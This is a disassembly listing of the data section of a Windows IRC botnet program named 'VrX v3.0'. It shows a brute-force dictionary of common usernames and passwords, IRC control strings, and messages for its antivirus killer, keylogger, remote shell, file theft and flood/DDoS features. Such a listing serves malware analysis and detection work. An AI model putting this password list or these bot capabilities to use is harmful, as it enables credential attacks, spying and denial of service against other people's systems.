dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_1 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_1 ; "server"
dd offset aRoot ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_0 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin_1 ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_0 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dword_4294CC dd 10h ; DATA XREF: sub_401ACD+AE0�r
; sub_401ACD+B0C�r ...
aIntranet db 'intranet',0 ; DATA XREF: .data:004294B8�o
align 4
aLan db 'lan',0 ; DATA XREF: .data:004294B0�o
aMain db 'main',0 ; DATA XREF: .data:004294AC�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .data:004294A8�o
aBlank db 'blank',0 ; DATA XREF: .data:004294A4�o
align 4
aOffice db 'office',0 ; DATA XREF: .data:004294A0�o
align 10h
aControl db 'control',0 ; DATA XREF: .data:0042949C�o
aXp_0 db 'xp',0 ; DATA XREF: .data:00429498�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:00429494�o
align 4
aHp db 'hp',0 ; DATA XREF: .data:00429490�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .data:0042948C�o
aCompaq db 'compaq',0 ; DATA XREF: .data:00429488�o
align 4
aDell db 'dell',0 ; DATA XREF: .data:00429484�o
align 10h
aCisco db 'cisco',0 ; DATA XREF: .data:00429480�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:0042947C�o
aOrainstall db 'orainstall',0 ; DATA XREF: .data:00429474�o
align 4
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:00429470�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:0042946C�o
aSa db 'sa',0 ; DATA XREF: .data:00429468�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .data:00429464�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:0042945C�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:00429458�o
align 4
aData db 'data',0 ; DATA XREF: .data:00429454�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:00429450�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:0042944C�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:00429448�o
align 10h
aAccess db 'access',0 ; DATA XREF: .data:00429444�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:0042943C�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:00429438�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:00429434�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:00429430�o
align 4
aHell db 'hell',0 ; DATA XREF: .data:0042942C�o
align 4
aGod db 'god',0 ; DATA XREF: .data:00429428�o
aSex db 'sex',0 ; DATA XREF: .data:00429424�o
; .data:off_438A68�o
aSlut db 'slut',0 ; DATA XREF: .data:00429420�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:0042941C�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:00429418�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:00429414�o
align 4
aBackup db 'backup',0 ; DATA XREF: .data:00429410�o
align 10h
aTechnical db 'technical',0 ; DATA XREF: .data:0042940C�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:00429408�o
align 4
aLogin_1 db 'login',0 ; DATA XREF: .data:00429404�o
align 10h
aMary db 'mary',0 ; DATA XREF: .data:00429400�o
align 4
aKatie db 'katie',0 ; DATA XREF: .data:004293FC�o
align 10h
aKate db 'kate',0 ; DATA XREF: .data:004293F4�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:004293F0�o
align 10h
aEric db 'eric',0 ; DATA XREF: .data:004293EC�o
align 4
aChris db 'chris',0 ; DATA XREF: .data:004293E8�o
align 10h
aIan db 'ian',0 ; DATA XREF: .data:004293E4�o
aNeil db 'neil',0 ; DATA XREF: .data:004293E0�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:004293DC�o
aBrian db 'brian',0 ; DATA XREF: .data:004293D8�o
align 4
aSusan db 'susan',0 ; DATA XREF: .data:004293D0�o
align 10h
aSue db 'sue',0 ; DATA XREF: .data:004293CC�o
aSam db 'sam',0 ; DATA XREF: .data:004293C8�o
aLuke db 'luke',0 ; DATA XREF: .data:004293C4�o
align 10h
aPeter db 'peter',0 ; DATA XREF: .data:004293C0�o
; .data:004293D4�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:004293BC�o
align 10h
aMike db 'mike',0 ; DATA XREF: .data:004293B8�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:004293B4�o
align 10h
aFred db 'fred',0 ; DATA XREF: .data:004293B0�o
align 4
aJoe db 'joe',0 ; DATA XREF: .data:004293AC�o
aJen db 'jen',0 ; DATA XREF: .data:004293A8�o
aBob db 'bob',0 ; DATA XREF: .data:004293A4�o
; .data:004293F8�o
aQwe db 'qwe',0 ; DATA XREF: .data:004293A0�o
aZxc db 'zxc',0 ; DATA XREF: .data:0042939C�o
aAsd db 'asd',0 ; DATA XREF: .data:00429398�o
aQaz db 'qaz',0 ; DATA XREF: .data:00429394�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:00429390�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0042938C�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:00429388�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:00429384�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .data:00429380�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:0042937C�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:00429378�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: .data:00429374�o
aOem db 'oem',0 ; DATA XREF: .data:00429370�o
; char aUser_0[]
aUser_0 db 'user',0 ; DATA XREF: sub_401ACD+45CF�o
; .data:0042936C�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:00429368�o
align 10h
aHome db 'home',0 ; DATA XREF: .data:00429364�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .data:00429360�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0042935C�o
align 10h
aInternet db 'internet',0 ; DATA XREF: .data:00429358�o
; .data:004294B4�o
align 4
aWww db 'www',0 ; DATA XREF: .data:00429354�o
; char aWeb[]
aWeb db 'web',0 ; DATA XREF: sub_401ACD+7283�o
; .data:00429350�o
aOutlook db 'outlook',0 ; DATA XREF: .data:0042934C�o
aMail db 'mail',0 ; DATA XREF: .data:00429348�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:00429344�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .data:00429340�o
align 4
; char aServer_1[]
aServer_1 db 'server',0 ; DATA XREF: sub_401ACD+3E8B�o
; .data:00429338�o
align 4
aSystem db 'system',0 ; DATA XREF: .data:00429334�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:0042932C�o
align 10h
aLinux db 'linux',0 ; DATA XREF: .data:00429328�o
align 4
aUnix db 'unix',0 ; DATA XREF: .data:00429324�o
align 10h
aDemo db 'demo',0 ; DATA XREF: .data:00429320�o
align 4
aNone db 'none',0 ; DATA XREF: .data:0042931C�o
align 10h
aTest db 'test',0 ; DATA XREF: .data:00429314�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:00429310�o
align 10h
a2003 db '2003',0 ; DATA XREF: sub_41AF8F+BA�o
; .data:0042930C�o
align 4
a2002 db '2002',0 ; DATA XREF: .data:00429308�o
align 10h
a2001 db '2001',0 ; DATA XREF: .data:00429304�o
align 4
a2000 db '2000',0 ; DATA XREF: .data:00429300�o
align 10h
a1234567890 db '1234567890',0 ; DATA XREF: .data:004292FC�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .data:004292F8�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .data:004292F4�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:004292F0�o
a123456 db '123456',0 ; DATA XREF: .data:004292EC�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:004292E8�o
align 4
a1234 db '1234',0 ; DATA XREF: .data:004292E4�o
align 4
a123 db '123',0 ; DATA XREF: .data:004292E0�o
a12 db '12',0 ; DATA XREF: .data:004292DC�o
align 4
a1: ; DATA XREF: .text:0040AFC7�o
; .data:004292D8�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .data:004292D4�o
aPwd db 'pwd',0 ; DATA XREF: .data:004292D0�o
aPass_1 db 'pass',0 ; DATA XREF: .data:004292CC�o
align 10h
aPass1234 db 'pass1234',0 ; DATA XREF: .data:004292C8�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:004292C4�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:004292C0�o
align 10h
aPassword1 db 'password1',0 ; DATA XREF: .data:004292BC�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:004292B8�o
aDb2 db 'db2',0 ; DATA XREF: .data:00429460�o
aOracle db 'oracle',0 ; DATA XREF: .data:00429478�o
align 4
aDba db 'dba',0
aDatabase db 'database',0 ; DATA XREF: .data:00429440�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:00429330�o
aGuest_0 db 'guest',0 ; DATA XREF: .data:00429318�o
align 4
aWwwadmin db 'wwwadmin',0
align 4
aTeacher db 'teacher',0 ; DATA XREF: .data:004294C0�o
aStudent db 'student',0 ; DATA XREF: .data:004294BC�o
aOwner db 'owner',0
align 10h
aComputer db 'computer',0
align 4
aRoot db 'root',0 ; DATA XREF: .data:0042933C�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:004294C4�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .data:004292B4�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .data:004292B0�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:004292AC�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:004292A8�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:004292A4�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:004292A0�o
align 4
aMircV6_21Khale db 'mIRC v6.21 Khaled Mardam-Bey',0 ; DATA XREF: .data:0042916C�o
align 4
aMircV6_20Khale db 'mIRC v6.20 Khaled Mardam-Bey',0 ; DATA XREF: .data:00429168�o
align 4
aMircV6_17Khale db 'mIRC v6.17 Khaled Mardam-Bey',0 ; DATA XREF: .data:00429164�o
align 4
aMircV6_16Khale db 'mIRC v6.16 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_429160�o
align 4
a@admin_com db '*@admin.com',0 ; DATA XREF: .data:off_42915C�o
; char asc_4299D4[]
asc_4299D4 db '-' ; DATA XREF: WinMain(x,x,x,x)+46B�o
db 3, 34h, 2
dd 6E656469h, 2036474h
aFailedToStartS db '- Failed to start server, error: <%d>.',0
align 4
; char asc_429A08[]
asc_429A08 db '-' ; DATA XREF: WinMain(x,x,x,x)+420�o
db 3, 34h, 2
dd 6E656469h, 2036474h
aServerRunningO db '- Server running on Port: 113.',0
align 4
; char asc_429A34[]
asc_429A34 db '-' ; DATA XREF: WinMain(x,x,x,x)+3F3�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0
align 4
; char asc_429A74[]
asc_429A74 db '-' ; DATA XREF: WinMain(x,x,x,x)+3A2�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aAvFwKillerActi db ' AV/FW Killer active.',0
align 4
; char asc_429A98[]
asc_429A98 db '-' ; DATA XREF: WinMain(x,x,x,x)+364�o
db 3, 34h, 2
dd 6E69616Dh, 202D0203h, 20746F42h, 72617473h, 2E646574h
dd 0
; char aSDS[]
aSDS db '%s %d "%s"',0 ; DATA XREF: WinMain(x,x,x,x)+28F�o
align 10h
; char Format[]
Format db '%s\%s',0 ; DATA XREF: WinMain(x,x,x,x)+189�o
; sub_41716F+45�o
align 4
; char aSS[]
aSS db '%s%s',0 ; DATA XREF: WinMain(x,x,x,x)+10D�o
; sub_4100B4+EA�o ...
align 10h
; char unk_429AD0
unk_429AD0 db 3 ; DATA XREF: sub_4017ED+F2�o
a81VrxConnected db '8,1-VrX- Connected to %s.',0
align 4
; char aNickSUserS00S[]
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_401955+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
; char aPassS[]
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_401955+35�o
align 4
; char aModeSS_0[]
aModeSS_0 db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7D25�o
align 4
; char aUserhostS[]
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7D0D�o
align 4
; char unk_429B34
unk_429B34 db 3 ; DATA XREF: sub_401ACD+7CF9�o
a81VrxUserSLogg db '8,1-VrX- User: %s logged in.',0
align 4
unk_429B54 db 3 ; DATA XREF: sub_401ACD+7CDC�o
a81VrxPasswordA db '8,1-VrX- Password accepted.',0
align 4
unk_429B74 db 3 ; DATA XREF: sub_401ACD+7C7B�o
a81VrxFailedHos db '8,1-VrX- *Failed host auth by: (%s!%s).',0
align 10h
; char aNoticeSHostAut[]
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401ACD+7C52�o
align 4
unk_429BC8 db 3 ; DATA XREF: sub_401ACD+7C14�o
a81VrxFailedPas db '8,1-VrX- *Failed pass auth by: (%s!%s).',0
align 4
; char aNoticeSYourAtt[]
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_401ACD+7C02�o
; sub_401ACD+7C69�o
align 10h
; char aNoticeSPassAut[]
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401ACD+7BEB�o
align 4
; char asc_429C48[]
asc_429C48: ; DATA XREF: sub_401ACD+7BBB�o
unicode 0, <~>,0
; char unk_429C4C
unk_429C4C db 3 ; DATA XREF: sub_401ACD+7B6B�o
a81VrxRandomNic db '8,1-VrX- Random nick change: %s',0
align 10h
; char unk_429C70
unk_429C70 db 3 ; DATA XREF: sub_401ACD+7AFD�o
a81VrxReconnect db '8,1-VrX- Reconnecting in %s seconds',0
align 4
; char unk_429C98
unk_429C98 db 3 ; DATA XREF: sub_401ACD+7AB9�o
a81VrxReconne_0 db '8,1-VrX- Reconnecting in %s ms',0
unk_429CB8 db 3 ; DATA XREF: sub_401ACD+7A99�o
a81VrxNickChang db '8,1-VrX- Nick changed to: ',27h,'%s',27h,'.',0
align 4
unk_429CDC db 3 ; DATA XREF: sub_401ACD+7A7D�o
a81VrxJoinedCha db '8,1-VrX- Joined channel: ',27h,'%s',27h,'.',0
unk_429CFC db 3 ; DATA XREF: sub_401ACD+7A5A�o
a81VrxPartedCha db '8,1-VrX- Parted channel: ',27h,'%s',27h,'.',0
unk_429D1C db 3 ; DATA XREF: sub_401ACD+7A3E�o
a81VrxIrcRawS_ db '8,1-VrX- IRC Raw: %s.',0
align 4
; char asc_429D34[]
asc_429D34 db '-' ; DATA XREF: sub_401ACD:loc_40948A�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToKillTh db '- Failed to kill thread: %s.',0
align 10h
unk_429D60 db 2Dh ; - ; DATA XREF: sub_401ACD+79B6�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aKilledThreadS_ db '- Killed thread: %s.',0
align 4
unk_429D84 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40943D�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aNoActiveThread db '- No active threads found.',0
unk_429DAC db 2Dh ; - ; DATA XREF: sub_401ACD+7966�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aStoppedDThread db '- Stopped: %d thread(s).',0
align 4
; char aAll[]
aAll db 'all',0 ; DATA XREF: sub_401ACD+794C�o
unk_429DD8 db 3 ; DATA XREF: sub_401ACD+7848�o
a81VrxPrefixCha db '8,1-VrX- Prefix changed to: ',27h,'%c',27h,'.',0
align 4
unk_429DFC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409300�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s',0
unk_429E20 db 2Dh ; - ; DATA XREF: sub_401ACD+7829�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFileOpenedS db ' File opened: %s',0
align 10h
unk_429E40 db 3 ; DATA XREF: sub_401ACD+7809�o
a81VrxServerCha db '8,1-VrX- Server changed to: ',27h,'%s',27h,'.',0
align 4
unk_429E64 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4092BD�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aCouldnTResol_0 db '- Couldn',27h,'t resolve hostname.',0
align 4
; char asc_429E8C[]
asc_429E8C db '-' ; DATA XREF: sub_401ACD+77C2�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS_ db '- Lookup: %s -> %s.',0
align 4
unk_429EAC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409255�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTermin db ' Failed to terminate process: %s',0
align 4
unk_429EDC db 2Dh ; - ; DATA XREF: sub_401ACD+777E�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledS db ' Process killed: %s',0
; char asc_429EFC[]
asc_429EFC db '-' ; DATA XREF: sub_401ACD:loc_4091F5�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTerm_0 db ' Failed to terminate process ID: %s',0
unk_429F2C db 2Dh ; - ; DATA XREF: sub_401ACD+7721�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledI db ' Process killed ID: %s',0
align 10h
; char asc_429F50[]
asc_429F50 db '-' ; DATA XREF: sub_401ACD+76DF�o
db 3, 34h, 2
dd 656C6966h, 202D0302h, 656C6544h, 20646574h, 27732527h
dd 2Eh
; char asc_429F6C[]
asc_429F6C db '-' ; DATA XREF: sub_401ACD+7667�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aSendFileSUserS db '- Send File: %s, User: %s.',0
dword_429F90 dd 234032Dh, 656C6966h, 202D0302h, 7473694Ch, 7325203Ah
; DATA XREF: sub_401ACD+75EC�o
dd 0
; char asc_429FA8[]
asc_429FA8 db '-' ; DATA XREF: sub_401ACD+75BF�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToStartC db ' Failed to start connection thread, error: <%d>.',0
align 4
; char asc_429FE8[]
asc_429FE8 db '-' ; DATA XREF: sub_401ACD+7550�o
db 3, 34h, 2
dd 69736976h, 2D030274h, 4C525520h, 7325203Ah, 2Eh
; char asc_42A000[]
asc_42A000 db '-' ; DATA XREF: sub_401ACD:loc_408F9D�o
db 3, 34h, 2
dd 6372696Dh, 202D0302h, 6D6D6F43h, 20646E61h, 746E6573h
dd 2Eh
unk_42A01C db 2Dh ; - ; DATA XREF: sub_401ACD+74C9�o
db 3, 34h, 2
db 6Dh ; m
db 69h, 72h, 63h
db 2
db 3, 2Dh, 20h
aClientNotOpen_ db 'Client not open.',0
align 4
; char asc_42A03C[]
asc_42A03C db '-' ; DATA XREF: sub_401ACD+748F�o
db 3, 34h, 2
dd 2646D63h, 43202D03h, 616D6D6Fh, 3A73646Eh, 732520h
unk_42A054 db 2Dh ; - ; DATA XREF: sub_401ACD+7481�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aErrorSendingTo db '- Error sending to remote shell.',0
align 10h
; char asc_42A080[]
asc_42A080 db 0Ah,0 ; DATA XREF: sub_401ACD+7469�o
; sub_4100B4+FB�o ...
align 4
unk_42A084 db 3 ; DATA XREF: sub_401ACD+7441�o
a81VrxReadFileF db '8,1-VrX- Read file failed: %s',0
align 4
unk_42A0A4 db 3 ; DATA XREF: sub_401ACD+7436�o
a81VrxReadFileC db '8,1-VrX- Read file complete: %s',0
align 4
aUnknowModeType db 'Unknow mode type.',0 ; DATA XREF: sub_401ACD:loc_408E97�o
align 4
; char aFailedToStartL[]
aFailedToStartL db 'Failed to start logging thread, error: <%d>.',0
; DATA XREF: sub_401ACD+73B4�o
align 4
; char aNormalKeyLogge[]
aNormalKeyLogge db 'Normal key logger active.',0 ; DATA XREF: sub_401ACD+733D�o
align 4
; char aNormal_0[]
aNormal_0 db 'normal',0 ; DATA XREF: sub_401ACD+72ED�o
align 10h
aKeylogerAlread db 'Keyloger Already running.',0 ; DATA XREF: sub_401ACD+7263�o
align 4
aVrxV3_0SitesKe db 'VrX v3.0 sites keylogger active.',0 ; DATA XREF: sub_401ACD+7236�o
; sub_401ACD+72E5�o
align 10h
aKeylog_0 db 'Keylog',0 ; DATA XREF: sub_401ACD+7231�o
align 4
; char unk_42A178
unk_42A178 db 3 ; DATA XREF: sub_401ACD+7216�o
a81VrxGethostS_ db '8,1-VrX- Gethost: %s.',0
align 10h
; char unk_42A190
unk_42A190 db 3 ; DATA XREF: sub_401ACD+71D2�o
a81VrxUnableToE db '8,1-VrX- Unable to extract Gethost command.',0
align 10h
; char unk_42A1C0
unk_42A1C0 db 3 ; DATA XREF: sub_401ACD+71B6�o
a81VrxGethostSC db '8,1-VrX- Gethost: %s, Command: %s',0
align 4
unk_42A1E4 db 3 ; DATA XREF: sub_401ACD+7119�o
a81VrxAliasAdde db '8,1-VrX- Alias added: %s.',0
align 10h
unk_42A200 db 3 ; DATA XREF: sub_401ACD+70E7�o
a81VrxPrivmsgSS db '8,1-VrX- Privmsg: %s: %s.',0
align 4
unk_42A21C db 3 ; DATA XREF: sub_401ACD+7096�o
a81VrxActionSS_ db '8,1-VrX- Action: %s: %s.',0
align 4
dword_42A238 dd 312C3803h, 5872562Dh, 7943202Dh, 2E656C63h, 0
; DATA XREF: sub_401ACD+7028�o
; char aPartS_1[]
aPartS_1 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+6FEE�o
; sub_401ACD+7A49�o
align 4
unk_42A258 db 3 ; DATA XREF: sub_401ACD+6FC7�o
a81VrxModeChang db '8,1-VrX- Mode change: %s',0
align 4
; char aModeS_0[]
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+6FB6�o
align 10h
dword_42A280 dd 234032Dh, 6E6F6C63h, 2D030265h, 77615220h, 73252820h
; DATA XREF: sub_401ACD+6F8D�o
dd 25203A29h, 73h
dword_42A29C dd 234032Dh, 6E6F6C63h, 2D030265h, 646F4D20h, 25282065h
; DATA XREF: sub_401ACD+6F1F�o
dd 203A2973h, 7325h
; char aModeS[]
aModeS db 'MODE %s',0 ; DATA XREF: sub_401ACD+6EC7�o
; char dword_42A2C0[]
dword_42A2C0 dd 234032Dh, 6E6F6C63h, 2D030265h, 63694E20h, 2528206Bh
; DATA XREF: sub_401ACD+6E95�o
dd 203A2973h, 7325h
; char aJoinSS_0[]
aJoinSS_0 db 'JOIN %s %s',0 ; DATA XREF: sub_401ACD+6E1D�o
align 4
; char aS[]
aS db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+6DEB�o
; sub_401ACD+6E71�o ...
align 10h
; char aPartS_0[]
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_401ACD+6DB6�o
; char asc_42A2F8[]
asc_42A2F8 db '-' ; DATA XREF: sub_401ACD+6D79�o
db 3, 34h, 2
dd 67726174h, 3023361h
aFailedToStartF db '- Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42A334[]
asc_42A334 db '-' ; DATA XREF: sub_401ACD+6D0E�o
db 3, 34h, 2
dd 67726174h, 3023361h
aFloodingSForSS db '- Flooding %s for %s seconds.',0
align 10h
unk_42A360 db 2Dh ; - ; DATA XREF: sub_401ACD+6CA8�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aFailedToStar_0 db '- Failed to start flood thread, error: <%d>.',0
align 4
; char asc_42A39C[]
asc_42A39C db '-' ; DATA XREF: sub_401ACD+6C39�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aTsunamiHeading db '- Tsunami heading for %s (%s seconds).',0
; char unk_42A3D0
unk_42A3D0 db 3 ; DATA XREF: sub_401ACD+6B9D�o
a81VrxRepeatNot db '8,1-VrX- Repeat not allowed in command line: %s',0
align 4
; char unk_42A404
unk_42A404 db 3 ; DATA XREF: sub_401ACD+6B60�o
a81VrxRepeatS db '8,1-VrX- Repeat: %s',0
align 4
dword_42A41C dd 312C3803h, 5872562Dh, 6544202Dh, 2E79616Ch, 0
; DATA XREF: sub_401ACD:loc_408591�o
; char aSSSS[]
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_401ACD+6A84�o
; sub_401ACD+6B37�o ...
align 10h
; char asc_42A440[]
